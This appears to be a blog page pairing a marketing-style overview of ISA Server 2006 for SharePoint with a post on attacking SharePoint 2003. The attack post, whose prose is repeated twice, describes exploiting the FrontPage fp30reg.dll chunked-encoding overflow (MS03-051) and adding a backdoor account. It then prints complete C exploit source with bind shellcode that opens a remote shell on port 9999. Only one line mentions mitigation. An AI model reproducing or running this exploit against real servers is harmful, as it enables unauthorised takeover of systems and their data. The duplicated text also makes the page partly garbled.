Overview and Features: ISA Server and SharePoint

* This article was written in the context of Internet Security and Acceleration (ISA) 2006, a technology now considered deprecated with the introduction of Forefront Threat Management Gateway (TMG). Variations may exist. *

Overview

Microsoft Internet Security and Acceleration (ISA) server can compliment your collaborations and communications environment by providing a SharePoint aware firewall, analyze of possible threats in your SharePoint traffic, and secure VPN architecture, allowing your organization to remain secure while providing robust channels for serving SharePoint. By leveraging ISA server, you can securely provide an extranet implementation, as well as securing possible internal threats. Serving SharePoint externally is a beneficial method of establishing collaboration and communication between business partners, customers, and even for remote divisions. By planning, designing, and implementing a secure environment using ISA server, you can ensure that your SharePoint data is only available to the right people.

The security of your SharePoint environment is only as good as the tools that you give your SharePoint and systems administrators. Through an intuitive user interface, you will be giving the people responsible for the health of your portal security configuration wizards, advanced monitoring tools, and a central location to manage SharePoint network access management.

Protecting your SharePoint environment involves many processes, however using ISA server can help simplify your goals. Serving your SharePoint environment entails controlling the flow of your SharePoint business data and it is moving back and forth between your company and an external partner. ISA server provides faculties where your SharePoint packets can pass to a secured network circuit and application-layer proxy services.

It is important that while you are using SharePoint that it isn’t serving when it doesn’t need to be, that connections are dropped immediately after an employee or customer is done. Using ISA server allows the ports that SharePoint uses to dynamically open and close using the technology described above, ensuring your portal security.

It is increasingly common to use SharePoint to store various file formats and integrate it with several varying technologies, all of which carry their own security implications. Using the advanced circuit filtering provided by ISA server, it is possible to integrate and distribute these varying application files while ensuring that your portal integrity is maintained. While the applications themselves may vary, so will the protocol often times that are associated with the application (such as integrating a pop3 email account access into your SharePoint portal), ISA server provides the method that make it possible to manipulate all types of traffic, giving an ease of availability to ensure only the appropriate systems services are serving the right data.

SharePoint can also prove to be rather slow loading over an external connection, which is for a variety of reasons. However, using the advanced accelerating web cache features in ISA server, it is possible to accelerate the time it takes your SharePoint portal to load and be ready for employee use, increasing overall efficiency.

Features

  • A new, simplified user interface
  • Support for multiple networks
  • Improved VPN support
  • VPN quarantine capabilities
  • Ability to create custom firewall user groups
  • More extensive protocol support
  • Customized protocol definitions
  • OWA Publishing Wizard
  • Improved support for FTP upload/download policy
  • Improved Web publishing
  • Port redirection for server publishing rules
  • Improved cache rules for centralized object storage
  • Path mapping for Web publishing rules
  • RADIUS support for Web proxy client authentication
  • Delegation of basic authentication
  • SecureID authentication
  • Firewall-generated forms (forms-based authentication)
  • Improved SMTP Message Screener
  • Improved HTTP filtering
  • Link translation
  • Improved monitoring and reporting
Share

Example Attack on SharePoint 2003 With Chunked Encodes and Overflow

In this article I will show how an attack might enter maliciously into a 2003 environment (this won’t work on MOSS) using some checks and exploitations. The code is pretty self-explanatory.

Most Microsoft hackers will note that the default installation directories, as discussed in other articles, are the quickest way to get a hold of a SharePoint site. However, there is other interesting information that can be gathered from the host before you begin your attack, as well as helping facilitate the takeover, from using some pretty common IIS exploits. Firstly, most attackers will execute a simple buffer overflow on the target host, this will in some cases allow the option of executing some arbitrary code on the server. The ultimate goal in this case would be to trip a remote buffer overrun due to a flaw in FrontPage server extensions (if the host is using ClickOnce for application deployment as well these are enabled), when we complete the overflow we should then have local system rights on the server, maybe we can even get a new account created so we can visit this server later and see if it can’t be a bridge for us to other systems. We are going to have to firstly chunked encoded request on our host, this should result in an output somewhat like:

————————————————————————
Event Type: Warning
Event Source: W3SVC
Event Category: None
Event ID: 2002
Description:
Out of process application ‘/LM/W3SVC/1/ROOT’ terminated unexpectedly.
————————————————————————

You should be able to find this in the event log following our attack on the SharePoint site. Our request will look something like POST /_vti_bin/_vti_aut/fp30reg.dl. A chunked encoded post will result in the control of ECX and EDI, with the exception occurring at a mov dword ptr [ECX+4],EDI instruction leading to remote command execution with privileges associated with the IWAM_machinename account.

We are just going to execute a little code in order to fully trip the overflow and see if we can’t get into the server (see code at bottom of this article).

If you want to eliminate this vulnerability, just use the IIS lockdown tool to disable the extensions properly.

********************************************************************************/

In this article I will show how an attack might enter maliciously into a 2003 environment (this won’t work on MOSS) using some checks and exploitations. The code is pretty self-explanatory.

Most Microsoft hackers will note that the default installation directories, as discussed in other articles, are the quickest way to get a hold of a SharePoint site. However, there is other interesting information that can be gathered from the host before you begin your attack, as well as helping facilitate the takeover, from using some pretty common IIS exploits. Firstly, most attackers will execute a simple buffer overflow on the target host, this will in some cases allow the option of executing some arbitrary code on the server. The ultimate goal in this case would be to trip a remote buffer overrun due to a flaw in FrontPage server extensions (if the host is using ClickOnce for application deployment as well these are enabled), when we complete the overflow we should then have local system rights on the server, maybe we can even get a new account created so we can visit this server later and see if it can’t be a bridge for us to other systems. We are going to have to firstly chunked encoded request on our host, this should result in an output somewhat like:

————————————————————————
Event Type: Warning
Event Source: W3SVC
Event Category: None
Event ID: 2002
Description:
Out of process application ‘/LM/W3SVC/1/ROOT’ terminated unexpectedly.
————————————————————————

You should be able to find this in the event log following our attack on the SharePoint site. Our request will look something like POST /_vti_bin/_vti_aut/fp30reg.dl. A chunked encoded post will result in the control of ECX and EDI, with the exception occurring at a mov dword ptr [ECX+4],EDI instruction leading to remote command execution with privileges associated with the IWAM_machinename account.

We are just going to execute a little code in order to fully trip the overflow and see if we can’t get into the server (see code at bottom of this article).

If you want to eliminate this vulnerability, just use the IIS lockdown tool to disable the extensions properly.

[c]
#pragma comment(lib,”ws2_32″)
#define VER “0.1”
/******** bind shellcode spawns persistent shell on port 9999 *****************************/
unsigned char kyrgyz_bind_code[] = {
0xEB, 0x03, 0x5D, 0xEB, 0x05, 0xE8, 0xF8, 0xFF, 0xFF, 0xFF, 0x8B, 0xC5, 0x83, 0xC0, 0x11, 0x33,
0xC9, 0x66, 0xB9, 0xC9, 0x01, 0x80, 0x30, 0x88, 0x40, 0xE2, 0xFA,
0xDD, 0x03, 0x64, 0x03, 0x7C, 0x09, 0x64, 0x08, 0x88, 0x88, 0x88, 0x60, 0xC4, 0x89, 0x88, 0x88,
0x01, 0xCE, 0x74, 0x77, 0xFE, 0x74, 0xE0, 0x06, 0xC6, 0x86, 0x64, 0x60, 0xD9, 0x89, 0x88, 0x88,
0x01, 0xCE, 0x4E, 0xE0, 0xBB, 0xBA, 0x88, 0x88, 0xE0, 0xFF, 0xFB, 0xBA, 0xD7, 0xDC, 0x77, 0xDE,
0x4E, 0x01, 0xCE, 0x70, 0x77, 0xFE, 0x74, 0xE0, 0x25, 0x51, 0x8D, 0x46, 0x60, 0xB8, 0x89, 0x88,
0x88, 0x01, 0xCE, 0x5A, 0x77, 0xFE, 0x74, 0xE0, 0xFA, 0x76, 0x3B, 0x9E, 0x60, 0xA8, 0x89, 0x88,
0x88, 0x01, 0xCE, 0x46, 0x77, 0xFE, 0x74, 0xE0, 0x67, 0x46, 0x68, 0xE8, 0x60, 0x98, 0x89, 0x88,
0x88, 0x01, 0xCE, 0x42, 0x77, 0xFE, 0x70, 0xE0, 0x43, 0x65, 0x74, 0xB3, 0x60, 0x88, 0x89, 0x88,
0x88, 0x01, 0xCE, 0x7C, 0x77, 0xFE, 0x70, 0xE0, 0x51, 0x81, 0x7D, 0x25, 0x60, 0x78, 0x88, 0x88,
0x88, 0x01, 0xCE, 0x78, 0x77, 0xFE, 0x70, 0xE0, 0x2C, 0x92, 0xF8, 0x4F, 0x60, 0x68, 0x88, 0x88,
0x88, 0x01, 0xCE, 0x64, 0x77, 0xFE, 0x70, 0xE0, 0x2C, 0x25, 0xA6, 0x61, 0x60, 0x58, 0x88, 0x88,
0x88, 0x01, 0xCE, 0x60, 0x77, 0xFE, 0x70, 0xE0, 0x6D, 0xC1, 0x0E, 0xC1, 0x60, 0x48, 0x88, 0x88,
0x88, 0x01, 0xCE, 0x6A, 0x77, 0xFE, 0x70, 0xE0, 0x6F, 0xF1, 0x4E, 0xF1, 0x60, 0x38, 0x88, 0x88,
0x88, 0x01, 0xCE, 0x5E, 0xBB, 0x77, 0x09, 0x64, 0x7C, 0x89, 0x88, 0x88, 0xDC, 0xE0, 0x89, 0x89,
0x88, 0x88, 0x77, 0xDE, 0x7C, 0xD8, 0xD8, 0xD8, 0xD8, 0xC8, 0xD8, 0xC8, 0xD8, 0x77, 0xDE, 0x78,
0x03, 0x50, 0xDF, 0xDF, 0xE0, 0x8A, 0x88, 0xAF, 0x87, 0x03, 0x44, 0xE2, 0x9E, 0xD9, 0xDB, 0x77,
0xDE, 0x64, 0xDF, 0xDB, 0x77, 0xDE, 0x60, 0xBB, 0x77, 0xDF, 0xD9, 0xDB, 0x77, 0xDE, 0x6A, 0x03,
0x58, 0x01, 0xCE, 0x36, 0xE0, 0xEB, 0xE5, 0xEC, 0x88, 0x01, 0xEE, 0x4A, 0x0B, 0x4C, 0x24, 0x05,
0xB4, 0xAC, 0xBB, 0x48, 0xBB, 0x41, 0x08, 0x49, 0x9D, 0x23, 0x6A, 0x75, 0x4E, 0xCC, 0xAC, 0x98,
0xCC, 0x76, 0xCC, 0xAC, 0xB5, 0x01, 0xDC, 0xAC, 0xC0, 0x01, 0xDC, 0xAC, 0xC4, 0x01, 0xDC, 0xAC,
0xD8, 0x05, 0xCC, 0xAC, 0x98, 0xDC, 0xD8, 0xD9, 0xD9, 0xD9, 0xC9, 0xD9, 0xC1, 0xD9, 0xD9, 0x77,
0xFE, 0x4A, 0xD9, 0x77, 0xDE, 0x46, 0x03, 0x44, 0xE2, 0x77, 0x77, 0xB9, 0x77, 0xDE, 0x5A, 0x03,
0x40, 0x77, 0xFE, 0x36, 0x77, 0xDE, 0x5E, 0x63, 0x16, 0x77, 0xDE, 0x9C, 0xDE, 0xEC, 0x29, 0xB8,
0x88, 0x88, 0x88, 0x03, 0xC8, 0x84, 0x03, 0xF8, 0x94, 0x25, 0x03, 0xC8, 0x80, 0xD6, 0x4A, 0x8C,
0x88, 0xDB, 0xDD, 0xDE, 0xDF, 0x03, 0xE4, 0xAC, 0x90, 0x03, 0xCD, 0xB4, 0x03, 0xDC, 0x8D, 0xF0,
0x8B, 0x5D, 0x03, 0xC2, 0x90, 0x03, 0xD2, 0xA8, 0x8B, 0x55, 0x6B, 0xBA, 0xC1, 0x03, 0xBC, 0x03,
0x8B, 0x7D, 0xBB, 0x77, 0x74, 0xBB, 0x48, 0x24, 0xB2, 0x4C, 0xFC, 0x8F, 0x49, 0x47, 0x85, 0x8B,
0x70, 0x63, 0x7A, 0xB3, 0xF4, 0xAC, 0x9C, 0xFD, 0x69, 0x03, 0xD2, 0xAC, 0x8B, 0x55, 0xEE, 0x03,
0x84, 0xC3, 0x03, 0xD2, 0x94, 0x8B, 0x55, 0x03, 0x8C, 0x03, 0x8B, 0x4D, 0x63, 0x8A, 0xBB, 0x48,
0x03, 0x5D, 0xD7, 0xD6, 0xD5, 0xD3, 0x4A, 0x8C, 0x88
};
void cmdshell (int sock);
long gimmeip(char *hostname);
int main(int argc,char *argv[])
{
WSADATA wsaData;
struct sockaddr_in targetTCP;
struct hostent *host;
int sockTCP,s;
unsigned short port = 80;
long ip;
unsigned char header[]= “POST /_vti_bin/_vti_aut/fp30reg.dll HTTP/1.1 “;
unsigned char packet[3000],data[1500];
unsigned char ecx[] = “xe0xf3xd4x67”;
unsigned char edi[] = “xffxd0x90x90”;
unsigned char call[] = “xe4xf3xd4x67”;//overwrite .data section of fp30reg.dll
unsigned char shortjmp[] = “xebx10″;
printf(” -={ Frontpage fp30reg.dll Overflow Exploit (MS03-051) ver %s }=- ”
” > “, VER);
if(argc < 2)
{
printf(” Usage: %s [Target] ”
” eg: fp30reg.exe 192.168.63.130 “,argv[0]);
return 1;
}
if(argc==3)
port = atoi(argv[2]);
WSAStartup(0x0202, &wsaData);
printf(“[*] Target: %s Port: %d “,argv[1],port);
ip=gimmeip(argv[1]);
memset(&targetTCP, 0, sizeof(targetTCP));
memset(packet,0,sizeof(packet));
targetTCP.sin_family = AF_INET;
targetTCP.sin_addr.s_addr = ip;
targetTCP.sin_port = htons(port);
sprintf(packet,”%sHost: %s Transfer-Encoding: chunked “,header,argv[1]);
memset(data, 0x90, sizeof(data)-1);
data[sizeof(data)-1] = ‘x0′;
memcpy(&data[16],edi,sizeof(edi)-1);
memcpy(&data[20],ecx,sizeof(ecx)-1);
memcpy(&data[250+10],shortjmp,sizeof(shortjmp)-1);
memcpy(&data[250+14],call,sizeof(call)-1);
memcpy(&data[250+70],kyrgyz_bind_code,sizeof(kyrgyz_bind_code));
sprintf(packet,”%sContent-Length: %d %x %s 0 “,packet,
strlen(data),strlen(data),data);
if ((sockTCP = socket(AF_INET, SOCK_STREAM, 0)) == -1)
{
printf(“[x] Socket not initialized! Exiting… “);
WSACleanup();
return 1;
}
printf(“[*] Socket initialized… “);
if(connect(sockTCP,(struct sockaddr *)&targetTCP, sizeof(targetTCP)) != 0)
{
printf(“[*] Connection to host failed! Exiting… “);
WSACleanup();
exit(1);
}
printf(“[*] Checking for presence of fp30reg.dll…”);
if (send(sockTCP, packet, strlen(packet),0) == -1)
{
printf(“[x] Failed to inject packet! Exiting… “);
WSACleanup();
return 1;
}
memset(packet,0,sizeof(packet));
if (recv(sockTCP, packet, sizeof(packet),0) == -1)
{
printf(“[x] Failed to receive packet! Exiting… “);
WSACleanup();
return 1;
}
if(packet[9]==’1′ && packet[10]==’0′ && packet[11]==’0’)
printf(” Found! “);
else
{
printf(” Not Found!! Exiting… “);
WSACleanup();
return 1;
}
printf(“[*] Packet injected! “);
closesocket(sockTCP);
printf(“[*] Sleeping “);
for(s=0;s<13000;s+=1000)
{
printf(“. “);
Sleep(1000);
}
printf(” [*] Connecting to host: %s on port 9999″,argv[1]);
if ((sockTCP = socket(AF_INET, SOCK_STREAM, 0)) == -1)
{
printf(” [x] Socket not initialized! Exiting… “);
WSACleanup();
return 1;
}
targetTCP.sin_family = AF_INET;
targetTCP.sin_addr.s_addr = ip;
targetTCP.sin_port = htons(9999);
if(connect(sockTCP,(struct sockaddr *)&targetTCP, sizeof(targetTCP)) != 0)
{
printf(” [x] Exploit failed or there is a Firewall! Exiting… “);
WSACleanup();
exit(1);
}
printf(” [*] Dropping to shell… “);
cmdshell(sockTCP);
return 0;
}
/*********************************************************************************/
void cmdshell (int sock)
{
struct timeval tv;
int length;
unsigned long o[2];
char buffer[1000];
tv.tv_sec = 1;
tv.tv_usec = 0;
while (1)
{
o[0] = 1;
o[1] = sock;
length = select (0, (fd_set *)&o, NULL, NULL, &tv);
if(length == 1)
{
length = recv (sock, buffer, sizeof (buffer), 0);
if (length <= 0)
{
printf (“[x] Connection closed. “);
WSACleanup();
return;
}
length = write (1, buffer, length);
if (length <= 0)
{
printf (“[x] Connection closed. “);
WSACleanup();
return;
}
}
else
{
length = read (0, buffer, sizeof (buffer));
if (length <= 0)
{
printf(“[x] Connection closed. “);
WSACleanup();
return;
}
length = send(sock, buffer, length, 0);
if (length <= 0)
{
printf(“[x] Connection closed. “);
WSACleanup();
return;
}
}
}
}
/*********************************************************************************/
long gimmeip(char *hostname)
{
struct hostent *he;
long ipaddr;
if ((ipaddr = inet_addr(hostname)) < 0)
{
if ((he = gethostbyname(hostname)) == NULL)
{
printf(“[x] Failed to resolve host: %s! Exiting… “,hostname);
WSACleanup();
exit(1);
}
memcpy(&ipaddr, he->h_addr, he->h_length);
}
return ipaddr;
}

[/c]

Share